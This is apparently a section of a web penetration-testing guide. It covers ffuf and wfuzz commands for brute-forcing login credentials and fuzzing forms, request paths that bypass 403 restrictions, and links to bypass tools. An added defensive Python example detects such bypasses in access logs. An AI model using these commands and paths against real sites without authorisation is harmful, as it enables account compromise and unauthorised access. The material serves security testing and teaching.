# WEB

## Introduction

Nowadays, websites are programmed using various technologies such as databases, web development frameworks, programming languages, APIs, data formats, protocols and browsers. Each of them has specific vulnerabilities that the developer should be aware of, which is not always the case, as you can see in [OWASP Top Ten](https://owasp.org/www-project-top-ten/).

This section contains several vulnerabilities worth checking whenever you are doing a web pentest.

## Form fuzzing

During a web vulnerability assessment, it is very likely that the web application has one or several POST forms asking for user data.

Fuzzing those forms might allow you to brute force credentials or discover vulnerabilities such as SSTI, SQLi, XSS, etc.

```bash
# USERS and PASSWDS are ffuf keywords, each replaced with entries from its own wordlist
ffuf -w "./usuarios.txt:USERS" -w "./wordlist.txt:PASSWDS" -t 60 -u http://<URL>/login -H "Content-Type: application/json;charset=utf-8" -X POST -d '{"username":"USERS","password":"PASSWDS"}'
```

There might also be cases where you need to encode the data (URL format, base64, etc.) before sending it to the server. To do so, use **wfuzz**, because **ffuf** **doesn't** support payload encoding.

```bash
# the trailing "urlencode" is the wfuzz encoder applied to every payload before it is sent
wfuzz -u http://<URL>/search -H 'Content-Type: application/x-www-form-urlencoded' -X POST -d 'name=FUZZ' -z file,/usr/share/wordlists/SecLists/Fuzzing/special-chars.txt,urlencode
```

## Bypass Forbidden

If the web server or the reverse proxy in front of it is misconfigured, you can try several techniques and tools to bypass the access restriction. The following request/response pairs illustrate path tricks that may turn a 403 into a 200:

```text
GET /admin ==> 403 Forbidden
GET /blablabal/%2e%2e/admin ==> 200 OK
GET /blablabal/..;/admin ==> 200 OK
GET /blablabal/;/admin ==> 200 OK
GET /blablabal/admin/..;/ ==> 200 OK
GET /admin?access=1 ==> 200 OK
```

There are several tools that you can use to try to bypass such filters:

* [bypass-url-parser](https://github.com/laluka/bypass-url-parser)
* [dontgo403](https://github.com/devploit/dontgo403)
* [forbidden](https://github.com/ivan-sincek/forbidden)
* [byp4xx](https://github.com/lobuhi/byp4xx)

**Note**: If you want to try all of them at the same time, you can use [403bypasser\_installer.sh](https://github.com/Marmeus/Kali-Booster/blob/main/Scripts/403bypasser_installer.sh) to install these tools and [403bypasser.sh](https://github.com/Marmeus/Kali-Booster/blob/main/Scripts/403bypasser.sh) to run them.
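The root cause behind the bypasses above is that the component enforcing the 403 matches the raw request target, while the backend routes a normalised one. The following added example (not part of this guide) shows the defensive side: canonicalising the path the way a Tomcat-style backend would before authorising it, and using the same routine to flag suspicious requests in access logs. The backend normalisation rules and the log lines are assumptions constructed for the example.

```python
import posixpath
import re
from urllib.parse import unquote

# Hypothetical weak front-end rule: only the exact request target "/admin" is denied.
DENY_EXACT = {"/admin"}
PROTECTED_PREFIXES = ("/admin",)

def canonicalize(target: str) -> str:
    """Reduce a raw request target to the path a Tomcat-style backend would route.
    Assumed backend behaviour: query dropped, repeated percent-decoding, ';param'
    stripped from every segment, '//' collapsed, '.' and '..' resolved."""
    path = target.split("?", 1)[0]
    for _ in range(3):                       # bounded loop also handles double encoding
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    path = "/".join(seg.split(";", 1)[0] for seg in path.split("/"))
    path = re.sub(r"/+", "/", path)          # normpath keeps a leading '//', so collapse first
    return posixpath.normpath(path or "/")

def naive_denied(target: str) -> bool:
    """The weak check: exact match on the raw target (what the 403 above relies on)."""
    return target in DENY_EXACT

def canonical_denied(target: str) -> bool:
    """The hardened check: authorise on the canonical path and by prefix."""
    c = canonicalize(target)
    return any(c == p or c.startswith(p + "/") for p in PROTECTED_PREFIXES)

def is_bypass_attempt(target: str) -> bool:
    """True when the weak rule passes a request that really reaches a protected path."""
    return canonical_denied(target) and not naive_denied(target)

LOG_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})')

def flag_log(lines):
    """Return (target, status) for every logged request that looks like a 403 bypass."""
    hits = []
    for line in lines:
        m = LOG_RE.search(line)
        if m and is_bypass_attempt(m["target"]):
            hits.append((m["target"], int(m["status"])))
    return hits

# Constructed sample access-log lines, modelled on the request/response pairs above.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /admin HTTP/1.1" 403 199',
    '10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /blablabal/%2e%2e/admin HTTP/1.1" 200 512',
    '10.0.0.5 - - [01/Jan/2024:10:00:02 +0000] "GET /blablabal/..;/admin HTTP/1.1" 200 512',
    '10.0.0.5 - - [01/Jan/2024:10:00:03 +0000] "GET /admin?access=1 HTTP/1.1" 200 512',
    '10.0.0.5 - - [01/Jan/2024:10:00:04 +0000] "GET /index.html HTTP/1.1" 200 1024',
]

if __name__ == "__main__":
    for target, status in flag_log(SAMPLE_LOG):
        print(f"possible 403 bypass: {target} -> {status}")
```

Note that `/blablabal/;/admin` and `/blablabal/admin/..;/` depend on backend quirks this simple model does not reproduce, which is exactly why the fix is to authorise on the path the backend itself will route rather than on the raw string.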
